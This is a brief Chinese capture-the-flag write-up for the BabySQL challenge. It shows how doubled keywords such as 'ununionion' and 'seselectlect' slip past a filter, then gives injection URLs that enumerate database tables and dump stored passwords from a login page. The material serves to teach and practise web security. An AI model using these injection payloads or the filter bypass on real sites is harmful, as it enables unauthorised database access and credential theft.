[极客大挑战 2019]BabySQL
知识点
- 双写绕过
过程
主页是一个登录框
随便输入两个参数,发现是传入的是get型参数
首先注入肯定存在,先尝试联合查询注入:
check.php?username=admin%27+union+select+1%2C2%2C3%23&password=admin
失败,双写union 和 select可绕过
check.php?username=admin%27+ununionion+seselectlect+1%2C2%2C3%23&password=admin
登陆成功,将参数admin置为假,可以看到页面有显示位置:
check.php?username=-admin%27+ununionion+seselectlect+1%2C2%2C3%23&password=admin
然后尝试注入
/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database()),3 %23&password=1111
check.php?username=1' ununionion selselectect 1,(seselectlect group_concat(passwoorrd) frfromom b4bsql),3 %23&password=1111
